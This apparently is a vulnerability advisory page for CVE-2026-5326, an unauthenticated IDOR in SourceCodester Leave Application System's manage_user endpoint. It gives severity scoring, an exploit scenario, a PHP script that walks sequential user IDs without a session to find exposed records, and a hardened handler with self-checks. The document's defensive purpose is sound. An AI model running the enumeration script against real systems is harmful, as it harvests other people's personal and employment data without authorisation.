
PHP CVE-2026-5326 (EUVD-2026-18188), MEDIUM
Authorization Bypass Through User-Controlled Key (CWE-639)
Published 2026-04-02 · VulDB · GHSA-x3j8-jq3m-7644
CVSS 4.0 (NVD): 5.5

Severity by source

NVD (primary): 5.5 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD; NVD is the only source that has scored this CVE.

CVSS Vector (NVD), metric by metric

Attack Vector: Network (AV:N)
Attack Complexity: Low (AC:L)
Attack Requirements: None (AT:N)
Privileges Required: None (PR:N)
User Interaction: None (UI:N)
Vulnerable System Impact: Confidentiality Low, Integrity None, Availability None (VC:L/VI:N/VA:N)
Subsequent System Impact: None (SC:N/SI:N/SA:N)
Exploit Maturity: Proof-of-Concept (E:P)
Note: CVSS 4.0 has no Scope metric. The "S:X" at the end of the vector is the supplemental Safety metric, left undefined, and the remaining X entries are the undefined environmental and supplemental metrics.

Lifecycle Timeline

  • Apr 03, 2026 16:10 (vuln.today): PoC detected; public exploit code available
  • Apr 02, 2026 11:00 (euvd): EUVD ID assigned, EUVD-2026-18188
  • Apr 02, 2026 11:00 (vuln.today): analysis generated
  • Apr 02, 2026 10:45 (nvd): CVE published, rated MEDIUM 5.5

Description (CVE.org)

A vulnerability was identified in SourceCodester Leave Application System 1.0. An unknown function of the file /index.php?page=manage_user, in the User Information Handler component, is affected: manipulation of the argument ID leads to an authorization bypass. The attack can be executed remotely. A public exploit is available and may be used.

Analysis (AI)

Remote authorization bypass in SourceCodester Leave Application System 1.0: an unauthenticated attacker can read other users' information through an insecure direct object reference (IDOR) in the /index.php?page=manage_user endpoint by changing the ID parameter. Note that this is an authorization failure (CWE-639), not an authentication bypass; the application simply never checks whether the requester may view the record it is asked for. A public exploit exists, and NVD rates it CVSS 4.0 5.5 (confidentiality impact Low, no integrity or availability impact). Actual risk depends on the sensitivity of the exposed user data and the deployment context.


Vulnerability Assessment (AI)

Risk Assessment: CVSS 5.5 (Network, Low Complexity, No Privileges, No User Interaction) combined with a publicly available proof of concept raises real-world risk above what the moderate base score suggests, since the attack needs nothing more than a browser and a loop over integer IDs. …
Exploit Scenario: An attacker sends HTTP GET requests to http://target/index.php?page=manage_user&ID=1, then ID=2, ID=3 and so on, iterating through sequential user IDs without supplying any session cookie or credentials. The vulnerable application returns the user details for each existing ID (name, email, phone, role, leave balance), so the attacker can enumerate every user and harvest personal and employment data. Because the IDs are small sequential integers, the whole user base can be pulled in seconds. …
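The enumeration described in the scenario, written as an added verification script rather than the published PoC (this is not SourceCodester code). It requests manage_user for a range of IDs with no Cookie header and reports which IDs come back as a populated record. The base URL, the ID range 1..20 and the regex used to recognise a loaded record in the HTML are assumptions, not facts from the advisory; tune the regex against one response you know is populated before trusting the result.

```php
<?php
// Added example (not SourceCodester code and not the published PoC): checks
// whether /index.php?page=manage_user returns a user record for sequential
// IDs when no session cookie is sent. Assumptions, not from the advisory:
// the base URL, the ID range, and the regex used to recognise a populated
// record in the returned HTML.
declare(strict_types=1);

/** GET a URL with no Cookie header and no redirect following; returns [status, body]. */
function fetchNoAuth(string $url): array
{
    $ctx = stream_context_create(['http' => [
        'method'          => 'GET',
        'ignore_errors'   => true,   // keep the body on 403/404/500
        'follow_location' => 0,      // report a login redirect as 3xx, not as the login page
        'timeout'         => 10,
        'header'          => "User-Agent: idor-check/1.0\r\n",
    ]]);
    $body   = @file_get_contents($url, false, $ctx);
    $status = 0;
    // $http_response_header is populated by file_get_contents in this scope.
    if (isset($http_response_header[0])
        && preg_match('#^HTTP/\S+\s+(\d{3})#', $http_response_header[0], $m)) {
        $status = (int) $m[1];
    }
    return [$status, $body === false ? '' : $body];
}

/**
 * Request manage_user for each ID in [$from, $to] and return the IDs whose
 * response is a 200 whose body matches $recordPattern. A redirect to the login
 * page (3xx) or a 403 means the authorization check held for that ID.
 */
function probeIds(string $base, int $from, int $to, string $recordPattern, callable $fetch): array
{
    $exposed = [];
    for ($id = $from; $id <= $to; $id++) {
        $url = rtrim($base, '/') . '/index.php?page=manage_user&ID=' . $id;
        [$status, $body] = $fetch($url);
        if ($status === 200 && preg_match($recordPattern, $body) === 1) {
            $exposed[] = $id;
        }
    }
    return $exposed;
}

// Assumed defaults: a lab copy you are authorised to test, IDs 1..20, and an
// edit form whose firstname/email inputs carry a non-empty value once a record loaded.
$base    = $argv[1] ?? 'http://target';
$pattern = $argv[2] ?? '/name="(?:firstname|email)"[^>]*value="[^"]+"/i';
$hits    = probeIds($base, 1, 20, $pattern, 'fetchNoAuth');
printf("%d of 20 IDs returned a user record with no authentication: %s\n",
       count($hits), $hits ? implode(', ', $hits) : 'none');
```

Run it as `php idor-check.php http://lab-host` against a system you are authorised to test. If the application redirects unauthenticated requests to a login page, every ID should show up as a 3xx and the script reports none; any ID it lists is a record the endpoint handed out with no session at all.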
Remediation: Add input validation and an authorization check to the User Information Handler: require an authenticated session before doing anything, validate that the ID parameter is a well-formed identifier, check that the record it names is one the current session is permitted to see (the user's own record, or any record only when the session holds an administrative role), and enforce that role-based check before any user data is returned. If prior unauthorized access is suspected, invalidate existing session tokens so that any captured sessions are useless. No fixed version is listed in the record shown here, so the check has to be applied in the application code. …
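What the remediation paragraph asks for, shown as an added example in the project's language. This is illustrative code, not SourceCodester's source: a minimal manage_user lookup in the vulnerable shape the advisory describes (the request's ID alone decides which record is read) sits beside a hardened version that authenticates, validates the ID, authorizes from server-side session state and only then queries. The users table, its columns and the admin/employee roles are assumptions for the demo, and the self-check runs against an in-memory SQLite table with constructed rows.

```php
<?php
// Added example (illustrative, not SourceCodester's source): a minimal
// manage_user lookup in the vulnerable shape the advisory describes, beside a
// hardened version that applies the checks from the remediation paragraph.
// The users table, its columns and the 'admin'/'employee' roles are assumptions.
declare(strict_types=1);

// Vulnerable shape: any ID the client sends is looked up. Nothing checks that
// a session exists or that the session is allowed to see that record.
function manageUserVulnerable(PDO $db, array $get): ?array
{
    $stmt = $db->prepare('SELECT id, firstname, lastname, email, role FROM users WHERE id = :id');
    $stmt->execute([':id' => (int) ($get['ID'] ?? 0)]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

final class AuthzException extends RuntimeException {}

// Hardened: authenticate, validate, authorize from server-side session state,
// then query. The ID in the request never decides access on its own.
function manageUserHardened(PDO $db, array $session, array $get): ?array
{
    if (empty($session['user_id'])) {
        throw new AuthzException('login required', 401);
    }
    $id = filter_var($get['ID'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new AuthzException('invalid ID', 400);
    }
    // RBAC plus ownership: admins may read any record, everyone else only their
    // own. Both facts come from the session set at login, not from the request.
    $isAdmin = ($session['role'] ?? '') === 'admin';
    if (!$isAdmin && $id !== (int) $session['user_id']) {
        throw new AuthzException('forbidden', 403);   // deny before touching the database
    }
    $stmt = $db->prepare('SELECT id, firstname, lastname, email, role FROM users WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Self-check against an in-memory SQLite table with constructed sample rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT, email TEXT, role TEXT)');
$db->exec("INSERT INTO users VALUES (1,'Ada','Lovelace','ada@example.test','admin'),
                                    (2,'Bob','Example','bob@example.test','employee')");

// No session at all, asking for someone else's record: the vulnerable handler returns it.
$leak = manageUserVulnerable($db, ['ID' => '2']);
printf("vulnerable, no session -> %s\n", $leak['email']);

$cases = [
    ['no session',      [],                                     ['ID' => '2']],
    ['bob reads ada',   ['user_id' => 2, 'role' => 'employee'], ['ID' => '1']],
    ['bob reads self',  ['user_id' => 2, 'role' => 'employee'], ['ID' => '2']],
    ['admin reads bob', ['user_id' => 1, 'role' => 'admin'],    ['ID' => '2']],
    ['tampered ID',     ['user_id' => 1, 'role' => 'admin'],    ['ID' => '2 OR 1=1']],
];
foreach ($cases as [$label, $session, $get]) {
    try {
        $row = manageUserHardened($db, $session, $get);
        printf("hardened, %-15s -> 200 %s\n", $label, $row['email'] ?? 'no such user');
    } catch (AuthzException $e) {
        printf("hardened, %-15s -> %d %s\n", $label, $e->getCode(), $e->getMessage());
    }
}
```

The ordering matters: the 401 and 403 decisions are taken before the database is consulted, so an attacker cannot use response timing or error text to learn whether a given ID exists. The same check has to be applied to every action that takes a user ID (view, edit, delete), not only to the page the advisory names; an IDOR fixed in one handler and left in another is still an IDOR.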



CVE-2026-5326 vulnerability details – vuln.today
